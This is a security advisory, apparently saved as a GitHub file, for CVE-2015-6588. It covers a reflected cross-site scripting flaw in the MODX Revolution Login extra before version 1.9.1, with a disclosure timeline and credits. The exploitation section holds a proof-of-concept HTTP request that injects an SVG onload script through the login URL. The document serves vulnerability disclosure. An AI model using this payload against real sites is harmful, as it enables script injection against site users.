-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcve-2015-6588.txt
More file actions
79 lines (49 loc) · 2.59 KB
/
cve-2015-6588.txt
File metadata and controls
79 lines (49 loc) · 2.59 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
MODX Reflected Cross-Site Scripting on Login Screen
I. INTRODUCTION
MODX Revolution is the web content management platform for those that truly care about no-compromise design and exceptional user experience. It gives you complete control over your site and content, with the flexibility and scalability to adapt to your changing needs.
More information about MODX is available on the official website at the following URL:
Vendor Homepage : http://modx.com/
II. DESCRIPTION
Veit Hailperin or Michael Schneider at scip AG found a Reflected Cross-Site Scripting (XSS) vulnerability in the login extra of MODX Revolution prior to version 1.9.1.
If a parameter is passed to the login site, it is copied verbatim into the response, due to the unfiltered placeholder [+request_uri] in the login package.
III. SCORING
CVSS Base Score 5 (CVSS#AV:N/AC:L/Au:N/C:N/I:P/A:N)
IV. Exploitation
Proof-of-Concept
POST /login.html?a"><svg/onload=alert(1)> HTTP/1.1
Host: vulnerable-installation.tld
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
username=admin&password=admin&returnUrl=%2Fde%2F&service=login&Login=Login
V. IMPACT
This is a traditional cross-site scripting with the regular impact.
VI. SOLUTION
MODX has released a patched version (1.9.1) of the Login Extra.
VII VENDOR RESPONSE
The vendor has been contacted and has replied.
VIII. DISCLOSURE TIMELINE
2015/05/18 Identification of the vulnerability
2015/08/28 First contact with MODX by E-Mail
2015/08/31 Answer from MODX Security Team
2015/08/31 Sending technical details and request a date for fix
2015/09/01 CVE assigned CVE-2015-6588
2015/09/21 Because no concrete date is proposed by MODX it's set to November 24th
2015/11/24 Release of advisory
2015/11/26 Release of patch
IX. CREDITS
The vulnerability was discovered by Veit Hailperin or Michael Schneider.
Veit Hailperin, Michael Schneider, scip AG, Zuerich, Switzerland
veha-at-scip.ch, misc-at-scip.ch
http://www.scip.ch
A1. LEGAL NOTICES
Copyright (c) 2002-2015 scip AG, Switzerland.
Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.